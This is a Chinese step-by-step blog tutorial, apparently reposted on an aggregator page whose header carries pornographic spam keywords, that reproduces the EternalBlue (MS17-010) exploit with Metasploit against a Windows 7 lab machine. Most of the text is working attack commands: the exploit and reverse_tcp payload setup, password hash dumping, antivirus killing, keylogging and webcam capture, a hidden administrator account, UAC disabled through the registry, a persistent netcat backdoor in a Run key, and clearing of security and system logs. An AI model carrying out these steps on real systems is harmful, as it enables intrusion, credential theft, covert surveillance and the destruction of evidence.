国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

這篇具有很好參考價(jià)值的文章主要介紹了永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

攻擊機(jī): kali Linux?????????? ? 靶機(jī): win7 x64???

提示:? 復(fù)現(xiàn)攻擊前請(qǐng)關(guān)閉殺毒軟件

?文章來源地址http://www.zghlxwxcb.cn/news/detail-404212.html

1.復(fù)現(xiàn)第一步按以下操作打開 445端口: 在 "運(yùn)行" 里輸入: regedit 打開注冊(cè)表編輯器??????????????????????????????????????????????????????????????????????????2. 依次打開目錄: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters

3. 在 Parameters 里有一個(gè)類型為 REG_DWORD 名字為 SmbDeviceEnabled 的的項(xiàng)?????????????????

4. 右鍵點(diǎn)擊修改,將它的16進(jìn)制制改為1???????????????????????永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程??????????????????????????????????????????????????????????????????????

?

?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

2. 在靶機(jī)打開 ”控制面版----系統(tǒng)和安全----Windows Update(在它下面點(diǎn)擊--查看已安裝的更新),打開后有很多補(bǔ)丁程序,找到用來防止永恒之藍(lán)的補(bǔ)丁并卸載它。我這里是 ( KB4012212 和 KB4499175) 。我已經(jīng)卸載。 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程 ??????????????????????????????????????????????????????? ? ?????? ? ?? ??

?

?

3.? 打開 “控制面版----系統(tǒng)和安全----Windows 防火墻----高級(jí)設(shè)置,在 "入站規(guī)則" 和 "出站規(guī)則" 分別啟用以下規(guī)則。??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程?

?

?

?

4. 打開 ”網(wǎng)絡(luò)和共享中心----更改高級(jí)共享設(shè)置,開啟以下設(shè)置。???????????????????????????????????????????????????????? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

5. 在 kali 輸入: nmap -T4 -A -v 192.168.189.181? #靶機(jī)ip地址---進(jìn)行ip端口掃描,圖2顯示靶機(jī)445端口被打開,存在永恒之藍(lán)漏洞。 ? ? ? ? ? ? ? ? ? ? ? ? ? ?? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程 ???????????????????????????????????

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

6. 打開 msfconsole 框架 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

7. 輸入 search ms17-010? 查看永恒之藍(lán)漏洞利用模塊?????????????????????????????????????????????????????????????????????? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

8.? 輸入 use auxiliary/scanner/smb/smb_ms17_010 ? 該模塊用于掃描,嗅探,指紋識(shí)別等相關(guān)功能。 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

9. 輸入? show options ? 查看模塊需要的配置參數(shù) ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

10. 輸入? set rhosts 192.168.189.181 ? 設(shè)置攻擊目標(biāo)和目標(biāo)和445端口號(hào) ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? ? ? ? ? ? ? ? ? ? ? ? ? ? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??

?

?

11. 再次輸入? show options??? 查看配置參數(shù)??????????????????????????????????????????????????????????????????????????????????????????????? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

12. 輸入? run? 執(zhí)行掃描 ,顯示主機(jī)容易被攻擊 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??

?

?

13. 輸入? use exploit/windows/smb/ms17_010_eternalblue ? 啟動(dòng)ms17-010 攻擊模塊 ? ? ? ? ? ? ? ? ? ? ? ?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

14. 輸入 info? 查看這個(gè)漏洞信息 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

15. 輸入? show targets ?? 顯示該攻擊模塊針對(duì)哪些操作系統(tǒng)、版本有用(可攻擊的平臺(tái))。 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

16.? 輸入? show payloads??? 查看攻擊載荷?????????????????????????????????????????????????????????????????????????????????????????????? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

17. 輸入? payload/windows/x64/meterpreter/reverse_tcp ? 設(shè)置攻擊載荷 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

19.? 輸入 set rhosts 192.168.189.181、set rport 445? 設(shè)置攻擊目標(biāo)ip和端口號(hào) ???????????????????????????????????????????????????????????????????????????? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

20. 輸入 set lhost 192.168.189.188、set lport 4444? 設(shè)置監(jiān)聽主機(jī)ip和端口號(hào)(kali)?????????????????????????????????

?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

21. 輸入 show options? 查看配置好的攻擊機(jī)和靶機(jī)參數(shù)???????????????????????????????????????????????????????????

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

22. 輸入? run ? 執(zhí)行攻擊,攻擊成功顯示下圖。成功后可以進(jìn)行文件上傳、獲取截屏、獲取密碼、打開攝像頭拍照、遠(yuǎn)程桌面鏈接、后門持久化等操作。 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

?

23.? 滲透成功后后續(xù)階段: 運(yùn)行run 成功后,開啟了一個(gè)reverse TCP 監(jiān)聽器來監(jiān)聽本地的4444端口( 攻擊者的本地主機(jī)地址 lhost 和端口號(hào) lport)。????????????????????????

@在meterpreter> 中可以使用以下命令來實(shí)現(xiàn)對(duì)目標(biāo)的操作:???

(1).? sysinfo????? 查看目標(biāo)主機(jī)系統(tǒng)信息? ? ? ? ? ? ? ? (2).? run? scraper? ??查看目標(biāo)主機(jī)詳細(xì)信息????????? ? ? (3).? hashdump?????? 導(dǎo)出密碼的哈希??????? ? ? ? ? ? ? ? (4).? load? kiwi???????? 加載??????????????????? ? ? ? ? ? ? ? ? ? (5).? ps??????????????????? 查看目標(biāo)主機(jī)進(jìn)程信息????? ? ? (6).? pwd??????????查看目標(biāo)主機(jī)當(dāng)前目錄(windows)? ? (7).? getlwd????????查看目標(biāo)主機(jī)當(dāng)前目錄(linux)???????? (8).? search? -f? *.jsp? -d? e:\??????? 搜所E盤中以.jsp為后綴的文件???????????????????????????????????????????????????????? (9).? download? e:\test.txt??? /root???將目標(biāo)的e:\test.txt 文件下載到/root 目錄下????????? ? ? ? ? ? ? ? ? (10).?upload?/root/test.txt?d:\test? ? ? 將/root/test.txt 上傳到目標(biāo)機(jī)器的 d:\test 目錄下?????????????????????

(11).? PIDmigrate? 1384????? 將當(dāng)前Meterpreter Shell的進(jìn)程遷移到PID為1384的進(jìn)程上??????????????? ?(12).? idletime????? 查看主機(jī)運(yùn)行時(shí)間????????????????? ? (13).? getuid???????? 查看獲取到的當(dāng)前權(quán)限? ? ? ? ?(14).? getsystem????? 提權(quán)?????????????????? ? ? ? ? ? ? ? ? ? ? ?(15).? run? killav?????? 關(guān)閉殺毒軟件??????????????? ? ? ? ? ?(16).? screenshot????? 截圖?????????????????????????? ? ? ? ? ? ? (17).? webcam_list?????查看目標(biāo)主機(jī)的攝像頭????????? (18).? webcam_snap????? 拍照???????????????????? ? ? ? ? ? ? (19).? webcam_stream????? 開視頻? ? ? ? ? ? ? ? ? ? (20).? execute? 參數(shù)? -f? 可執(zhí)行文件? ?執(zhí)行可執(zhí)行程序??? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??(21).? run? getgui? -u? hack? -p? 123? ? ? ? ? ? ? ? ? ? 創(chuàng)建hack用戶,密碼為123????????????????????????????????? ? ? (22).? run? getgui? -e????開啟遠(yuǎn)程桌面鏈接? ? ? ?(23).? keyscan_start????? 開啟鍵盤記錄功能? ? ? (24).? keyscan_dump???顯示捕捉到的鍵盤記錄信息(25).? keyscan_stop?????停止鍵盤記錄功能????????? (26).? uictl? disable? keyboard????禁止目標(biāo)使用鍵盤(27).? uictl? enable? keyboard ? ? 允許目標(biāo)使用鍵盤 (28).? uictl? disable? mouse ? ? ? ?禁止目標(biāo)使用鼠標(biāo) (29).? uictl? enable?? mouse ? ? ? ?允許目標(biāo)使用鼠標(biāo) (30).? load? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?使用擴(kuò)展庫? ? ? ? (31).? run ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ???執(zhí)行攻擊 ? ? ? ? ? (32).? clearev ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?清除日志 ? ? ? ?????

?

?

?

24.?? 示例: 輸入 sysinfo? 查看目標(biāo)主機(jī)系統(tǒng)???????????????????????????????????????????????????????????????????????????????????????

? ? ? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

25. 示例:輸入 ipconfig? 查看主機(jī)ip????????????????????? ? ?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程?????????????????????????????????????????????????????????????????????????

?

?

?

26.? 示例: 輸入 getuid? 查看用戶身份(windows 系統(tǒng)權(quán)限) ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

27. ? 示例: 輸入 shell? 獲得shell控制臺(tái)????????????????????永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程????????????????????????????????????????????????????????????????????????

?

?

?

28.? 想要從目標(biāo)主機(jī)shell 退出到 meterpreter,輸入 exit? 退出shell。??????永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程???????????????????????????????????????????

?

?

?

29. 示例: 輸入 screenshot? 獲取靶機(jī)截屏 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程 ??

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

30. 以下模塊主要用于在獲得目標(biāo)主機(jī)系統(tǒng)遠(yuǎn)程控制權(quán)后,進(jìn)行一系列后滲透攻擊

(1).? run post/windows/manage/migrate????? 自動(dòng)進(jìn)程遷移????????????????????????? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? (2).? run post/windows/gather/checkvm?????? 查看靶機(jī)是否運(yùn)行在虛擬機(jī)上??????????????????????????????????????? (3).? run post/windows/manage/killav????????? 關(guān)閉殺毒軟件????????????????????????????????????? ? ? ? ? ? ? ? ? ? ? ? ? ? ?(4).? run post/windows/manage/enable_rdp??????? 開啟遠(yuǎn)程桌面服務(wù)?????????????????????????????????????????????????? (5).? run post/windows/manage/autoroute?????????? 查看路由信息????????????????????????????????????????????????????????? (6).?run post/windows/gather/enum_logged_on_users?????列舉當(dāng)前登錄的用戶?? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? (7).? run post/windows/gather/enum_applications?????? 列舉應(yīng)用程序? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ???? (8).? run windows/gather/credentials/windows_autologin抓取自動(dòng)登錄的用戶名和密碼? ? ? ? ? ? ? ? ? ? ? ? ? ?(9).? run windows/gather/smart_hashdump??????? dump出所由用戶的hash

?

?

?

31. 示例: 輸入? hashdump 或 run windows/gather/smart_hashdump ?? 獲取用戶密碼?? ? ? ? ? ? ? ? ? ??永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程 ?????????????????

?

?

32.? 將得到的哈希碼放到MD5在線破解上解密得到明文密碼 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

33.? 輸入? shell? 進(jìn)入shell控制臺(tái)???????????????????永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程??????????????????????????????????????????????????????????????????????????????????????????

?

?

34.? 輸入?? net user hackk 123456 add??? 在靶機(jī)上創(chuàng)建一個(gè)名為hackk的用戶,密碼為123456?????????? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

35. 輸入? net? localgroup? administrators? hackk? /add??? 將hackk添加到Windows 7的本地管理員組中,以便獲得更大的權(quán)限。?????????????????????????????

?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

36. 輸入? net? user ?? 查看本地用戶 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

37. 輸入? net? localgroup? administrators ?? 查看本地管理員 ,可以看到hackk已被添加進(jìn)管理員組中? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

38. 輸入? run getgui -e? 或? run post/windows/manage/enable_rdp??? 開啟靶機(jī)遠(yuǎn)程桌面鏈接????????????

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

39.? 在kali 輸入? rdesktop? 192.168.189.188???靶機(jī)ip地址,就可打開遠(yuǎn)程桌面?????? ?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程?????????????????????

?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

40.? 輸入? hashdump? 查看用戶密碼?????????????????????永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

41. 輸入? netsh firewall add portopening TCP 4444 "hackk"? ENABLE ALL ?? 創(chuàng)建防火墻規(guī)則 ? ? ? ? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

42. 輸入? netsh firewall add portopening TCP 443? "hackk"? ENABLE ALL??? 新建一條防火墻規(guī)則,允許443端口訪問網(wǎng)絡(luò)???????????????????????? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

43. 輸入????cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 關(guān)閉UAC,以達(dá)到阻止未經(jīng)用戶授權(quán)的程序啟動(dòng)破壞系統(tǒng)??????????????????????????????????????????????????????????????????

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

44. 輸入?? cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 開啟默認(rèn)共享,方便攻擊者執(zhí)行遠(yuǎn)程命令 ?

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

45. 在kali 輸入? ls /usr/share/windows-binaries/nc.exe???? 查看nc反彈后門程序在kali里的路徑 ????????????????????????????????????

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

46. 輸入? upload /usr/share/windows-binaries/nc.exe? C:\\Windows? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 上傳nc到靶機(jī)C盤windows文件夾中,打開靶機(jī)可以看到從kali上傳到win7的nc程序永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程?????

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????

?

?

?

47. 輸入? reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\Windows\nc.exe -Ldp 443 -e cmd.exe'? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?當(dāng)靶機(jī)開機(jī)后,允許443端口訪問網(wǎng)絡(luò)。(用于連接nc的端口)??????????????????????????????????????? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

48. 輸入? run? post/windows/manage/enable_rdp? ? ? ? ? ? ? ? ? ? 開啟目標(biāo)遠(yuǎn)程桌面鏈接 ,然后在kali輸入?

rdesktop 192.168.189.188? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? (靶機(jī)ip) 鏈接遠(yuǎn)程桌面,并重啟靶機(jī)?????????????????????? ? ? ? ? ? ? ? ? ? ??

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

49. 在kali 輸入? nc -v 192.168.189.188 443?????? 就可以通過nc連接靶機(jī)進(jìn)入控制臺(tái)

? ?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

50.? 向反彈到kali的靶機(jī)控制臺(tái)輸入?? wevtutil cl security???? 清除登錄日志??????????????????????????????????????????????????

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

52.? 向反彈到kali的靶機(jī)控制臺(tái)輸入?? wevtutil cl system ??? 清除系統(tǒng)日志????? ? ? ? ?? 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

53.? 向反彈到kali的靶機(jī)控制臺(tái)輸入? wevtutil cl application? 清除應(yīng)用程序日志??

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?

?

55. 靶機(jī)日制被清空,滲透完成? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ??

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

?

?永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

到了這里,關(guān)于永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)

    永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)

    永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010) 環(huán)境 信息收集 先掃描目標(biāo)靶機(jī)IP 進(jìn)入MSF查看是否存在永恒之藍(lán)的漏洞 攻擊 攻擊機(jī):kali 靶機(jī):Windows Server 2008 對(duì)ip進(jìn)行收集開放什么端口 先掃描目標(biāo)靶機(jī)IP 因?yàn)樵谕粋€(gè)內(nèi)網(wǎng)之中 所以可以使用arp-scan -l 進(jìn)行查詢 知道目標(biāo)靶機(jī)IP(192.168.162.146)來進(jìn)

    2024年03月25日
    瀏覽(21)
  • 【ms17-010】永恒之藍(lán)漏洞復(fù)現(xiàn)

    【ms17-010】永恒之藍(lán)漏洞復(fù)現(xiàn)

    準(zhǔn)備工作 攻擊機(jī):kali,ip:192.168.56.128 靶機(jī):windows server 2003,ip:192.168.56.132 工具:nmap(掃描)、msf 漏洞利用 首先我們先在攻擊機(jī)上使用nmap掃一下該網(wǎng)段主機(jī)的存活情況 此時(shí)已經(jīng)掃描出來了,ip為: 192.168.56.132 的主機(jī)開啟,并且顯示了開放的端口號(hào)。 然后我們可以使用:

    2024年01月19日
    瀏覽(20)
  • 永恒之藍(lán)ms17_010漏洞復(fù)現(xiàn)

    永恒之藍(lán)ms17_010漏洞復(fù)現(xiàn)

    攻擊機(jī):Linux kali(IP:192.168.52.132) 靶機(jī):Windows 7(x64)(IP:192.168.52.130) 條件:靶機(jī)防火墻關(guān)閉,兩臺(tái)機(jī)子能夠相互ping通,靶機(jī)445端口開啟(永恒之藍(lán)漏洞就是通過惡意代碼掃描并攻擊開放445端口的 Windows 主機(jī)) ? 登錄 kali linux,用 nmap 探測(cè)本網(wǎng)段存活主機(jī) nmap 192.168.5

    2024年02月11日
    瀏覽(19)
  • 《MS17-010(永恒之藍(lán))—漏洞復(fù)現(xiàn)及防范》

    《MS17-010(永恒之藍(lán))—漏洞復(fù)現(xiàn)及防范》

    作者: susususuao 免責(zé)聲明:本文僅供學(xué)習(xí)研究,嚴(yán)禁從事非法活動(dòng),任何后果由使用者本人負(fù)責(zé)。 - 永恒之藍(lán) 永恒之藍(lán)(Eternal Blue)是一種利用Windows系統(tǒng)的SMB協(xié)議漏洞來獲取系統(tǒng)的最高權(quán)限,以此來控制被入侵的計(jì)算機(jī)。而SMB服務(wù)是一個(gè)協(xié)議名,它能被用于Web連接和客戶端與服

    2024年02月06日
    瀏覽(29)
  • ms17-010(永恒之藍(lán)) 漏洞復(fù)現(xiàn)與處理

    ms17-010(永恒之藍(lán)) 漏洞復(fù)現(xiàn)與處理

    ms17_010 是一種操作系統(tǒng)漏洞,僅影響 Windows 系統(tǒng)中的 SMBv1 服務(wù)。這個(gè)漏洞是由于 SMBv1 內(nèi)核函數(shù)中的緩沖區(qū)溢出而導(dǎo)致的。攻擊者可以通過該漏洞控制目標(biāo)系統(tǒng),并執(zhí)行任意代碼。這個(gè)漏洞通過 445 文件共享端口進(jìn)行利用,一旦攻擊者成功利用該漏洞,就可以在目標(biāo)主機(jī)上植入

    2024年02月09日
    瀏覽(25)
  • MS17-010(永恒之藍(lán))漏洞分析與復(fù)現(xiàn)

    MS17-010(永恒之藍(lán))漏洞分析與復(fù)現(xiàn)

    一、漏洞簡介 1、永恒之藍(lán)介紹: 永恒之藍(lán)漏洞(MS17-010),它的爆發(fā)源于 WannaCry 勒索病毒的誕生,該病毒是不法分子利用NSA(National Security Agency,美國國家安全局)泄露的漏洞 “EternalBlue”(永恒之藍(lán))進(jìn)行改造而成 。勒索病毒的肆虐,儼然是一場(chǎng)全球性互聯(lián)網(wǎng)災(zāi)難,給廣

    2024年02月02日
    瀏覽(22)
  • 利用kali Linux復(fù)現(xiàn)永恒之藍(lán)(MS17-010)漏洞

    利用kali Linux復(fù)現(xiàn)永恒之藍(lán)(MS17-010)漏洞

    目錄 什么是永恒之藍(lán)? 永恒之藍(lán)漏洞原理 實(shí)驗(yàn)環(huán)境 操作前提 實(shí)驗(yàn)步驟 (1)復(fù)現(xiàn)成功后,執(zhí)行截圖命令 (2)對(duì)受害機(jī)器建立用戶,并且開啟受害機(jī)器的遠(yuǎn)程桌面并連接 永恒之藍(lán)是指2017年4月14日晚,黑客團(tuán)體Shadow Brokers(影子經(jīng)紀(jì)人)公布一大批網(wǎng)絡(luò)攻擊工具,其中包含“永恒

    2024年02月12日
    瀏覽(24)
  • 復(fù)現(xiàn)永恒之藍(lán)[MS17_010]

    復(fù)現(xiàn)永恒之藍(lán)[MS17_010]

    目錄 準(zhǔn)備靶機(jī) 測(cè)試ping連通性 攻擊漏洞 利用漏洞 1臺(tái)kali,1臺(tái)win7 win7系統(tǒng)可以在MSDN鏡像網(wǎng)站里獲取 注:將win7安裝好,win7無法安裝vmtools,若升級(jí)系統(tǒng),可能會(huì)把永恒之藍(lán)補(bǔ)丁打上,所以建議別升級(jí)系統(tǒng) ? ? win7的IP地址為192.168.164.129 ?kali的IP地址為192.168.164.130 將這兩臺(tái)機(jī)器互

    2024年02月01日
    瀏覽(21)
  • 永恒之藍(lán)(ms17-010)簡介與復(fù)現(xiàn)

    永恒之藍(lán)(ms17-010)簡介與復(fù)現(xiàn)

    永恒之藍(lán)是指2017年4月14日晚,黑客團(tuán)體Shadow Brokers(影子經(jīng)紀(jì)人)公布一大批網(wǎng)絡(luò)攻擊工具,其中包含“永恒之藍(lán)”工具,“永恒之藍(lán)”利用Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)最高權(quán)限。5月12日,不法分子通過改造“永恒之藍(lán)”制作了wannacry勒索病毒,英國、俄羅斯、整個(gè)歐洲

    2024年02月10日
    瀏覽(27)
  • 永恒之藍(lán)漏洞 ms17_010 詳解

    永恒之藍(lán)漏洞 ms17_010 詳解

